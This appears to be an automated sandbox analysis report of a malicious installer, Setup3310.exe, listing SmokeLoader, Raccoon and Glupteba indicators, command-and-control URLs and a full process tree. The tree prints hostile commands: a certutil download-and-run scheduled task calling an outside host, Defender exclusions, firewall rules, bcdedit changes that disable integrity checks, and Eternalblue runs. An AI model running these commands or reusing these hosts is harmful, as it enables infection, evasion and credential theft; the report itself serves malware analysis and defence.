Resubmissions
18-03-2021 16:36
210318-gp18cmknhn 1018-03-2021 16:36
210318-c2gfjesvja 1018-03-2021 16:36
210318-vqkv89gzv2 1018-03-2021 16:36
210318-hkbpmljzte 1018-03-2021 16:36
210318-x2ph225zjs 1018-03-2021 16:04
210318-a66favrxcs 10Analysis
-
max time kernel
1765s -
max time network
1802s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-03-2021 16:36
General
-
Target
Setup3310.exe
-
Size
381KB
-
MD5
acf61459d6319724ab22cb5a8308d429
-
SHA1
8a5d782e6f31c3005e5e0706a3d266ece492a6cf
-
SHA256
344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
-
SHA512
d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 14 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 22 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 10 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
GoLang User-Agent 18 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 19 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 27 IoCs
-
Script User-Agent 15 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 58 IoCs
-
Suspicious use of FindShellTrayWindow 19 IoCs
-
Suspicious use of SendNotifyMessage 13 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-BPS56.tmp\Setup3310.tmp" /SL5="$2015A,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A18LD.tmp\Setup.tmp" /SL5="$201A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PPD8N.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-7OEG3.tmp\Delta.tmp" /SL5="$10202,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\Delta.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-HRMQL.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-O3DSJ.tmp\PictureLAb.tmp" /SL5="$20202,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-5Q4SC.tmp\PictureLAb.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-96118.tmp\Setup.tmp" /SL5="$40164,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-JSA3I.tmp\Setup.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-4UT87.tmp\HGT.exe" /S /UID=lab2149⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
-
C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe"C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-46A1L.tmp\prolab.tmp" /SL5="$50160,575243,216576,C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe"C:\Users\Admin\AppData\Local\Temp\4a-409e7-2cf-67cbb-1c49958b0c3e1\Paekygibina.exe"10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exeC:\Users\Admin\AppData\Local\Temp\w3qhzfgl.kjx\gaooo.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\w5xu5ofa.252\md7_7dfj.exe12⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\rovmimzz.3h4\askinstall29.exe12⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exeC:\Users\Admin\AppData\Local\Temp\wrveltsq.4ib\customer4.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ea4qemi4.ach\GcleanerWW.exe /mixone & exit11⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gttwksig.czn\privacytools5.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-2222 & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exeC:\Users\Admin\AppData\Local\Temp\4urv2vsp.sek\setup.exe /8-222212⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Frosty-Field"13⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Frosty-Field\7za.exe"C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp-plugins.7z13⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys""13⤵
-
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" -map "C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys"14⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Program Files (x86)\Frosty-Field\7za.exe"C:\Program Files (x86)\Frosty-Field\7za.exe" e -p154.61.71.51 winamp.7z13⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" /8-222213⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Frosty-Field\setup.exe"C:\Program Files (x86)\Frosty-Field\setup.exe" /8-222214⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"15⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes16⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-222215⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F16⤵
- Creates scheduled task(s)
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F16⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"16⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 017⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 117⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast17⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 017⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}17⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v16⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe16⤵
- Executes dropped EXE
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"16⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)17⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)18⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8416⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.9316⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8816⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7916⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.8516⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.6516⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7216⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.6816⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.9116⤵
-
-
C:\Windows\SysWOW64\arp.exearp -a 10.7.0.7616⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Doublepulsar-1.3.1.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\YjmIHyqGpcU\Eternalblue-2.2.0.exe16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe16⤵
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exeC:\Users\Admin\AppData\Local\Temp\csrss\smb\glprwxRqmASCIkjzTlpU\Eternalblue-2.2.0.exe16⤵
-
-
